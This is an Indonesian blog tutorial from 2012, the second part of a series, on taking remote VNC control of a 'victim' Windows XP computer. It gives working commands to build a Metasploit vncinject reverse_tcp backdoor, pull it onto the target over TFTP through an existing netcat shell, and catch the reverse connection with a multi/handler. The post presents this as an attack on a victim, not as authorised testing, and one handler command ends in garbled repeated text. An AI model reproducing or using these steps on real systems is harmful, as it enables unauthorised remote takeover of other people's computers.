Rabu, 14 Maret 2012

Remote paksa komputer korban

Sebelum kita membahasa tentang tehnik mendapatkan akses remote vlc via metasploit … sebaiknya teman-teman membaca ini postingan ini terlebih dahulu [..Remote windows dengan backdoor exe (bagian 1)/ ] karena postingan ini merupakan sambungan dari postingan tersebut.
Seperti pada postingan saya yang lalu mengenai remote windows dengan backdoor.exe kita sudah mendapatkan akses shell komputer target… Jadi anggapan saya anda telah berhasil pada tutorial saya yang pertama dan telah mendapatkan akses shell target dengan mengunakan NC ( netcat ) dalam hal ini saya spesifisikan sebagai berikut :

komputer penyerang
- ip addr : 192.168.1.34
- os : backtrack R2
komputer target
- ip addr : 192.168.1.33
- os windows xp sp2
Diakesnya shell via netcat akan membuka kita untuk mengakses komputer korban
powned windows with netcat
Langkah berikutnya kita harus membuat backdoor lagi .. hahaha maap ya.. kebanyakan bikin backdoor deh :P . Kalo pada tutorial sebelumnya kita membuat backdoor.exe yang di sisipi netcat kali ini kita buat backdoor via metasploit untuk membuka akses reverse_tcp yang nantinya akan membuat koneksi vnc …okey ..
ikuti langkah-langkah berikut ini
root@IBTeam:~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.34 LPORT=2482 x > /tmp/zee-ganteng.exe
ket : windows/vncinject/reverse_tcp —- payload yang di gunakan
LHOST = isikan ip anda
LPORT = isikan port yang memungkinkan ..
/tmp = direktori di mana kita akan mengesave backdoor …
mengapa di /tmp ? .. ya karena kita akan menggunakan fasilitas tftp ( default directory tftpd )
zee-ganteng.exe — nama backdoor , bisa gunakan nama sesuai kreasi ente :P
backdoor sudah tercipta

Seep tahap persiapan telah anda lewati .. sekarang mari kita exploitasi lebih lanjut.. :P . Pindahkan file backdoor yang barusan kita buat tadi ( zee-ganteng.exe ) ke komputer target :D . Dengan ap ? ya dengan TFTPD service .
aktifkan dengan
menu —–>  service —–> TFTPD —–> TFTPD —–> start TFTPD

Sekarang anda mengerti kenapa saya memilih directory /tmp untuk mensave backdoor .. ya karena home directory TFTPD secara default berada di sana… Lanjut kang :D
Untuk memindahkan backdoor tersebut bukanlah hal yang sulit ..
Pada shell windows tadi ketikan perintah :
tftp -i 192.168.1.34 GET /tmp/zee-ganteng.exe

Ok udah sukses perjalanan kita sampai di sini hehehe… sudah saatnya kita action sekarang … buka kembali shell pada tab baru .. masuk ke metasploit
root@IBTeam~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.34 RPORT=2428 DisabledCourtesySHell=true Ewindows/vncinject/reverse_tcpwindows/vncinject/reverse_tcp

Nah tinggal kita jalankan saja file backdoor reverse_tcp tadi :)

Perintah agar runnig hanya dengan menuliskan file yang hendak di esekusi terus enter.. perhatikan gambar di atas.
Setelah backdoor tersebut berhasil di aktifkan … we have the vnc server active

Bagi temen2 yang kurang jelas dengna tutorial ini. Silahkan mendownload video tutorial yang udah ane buat … just for share.. long live open source
video link :
http://www.ziddu.com/download/14923691/vnc.rar.html

1 komentar: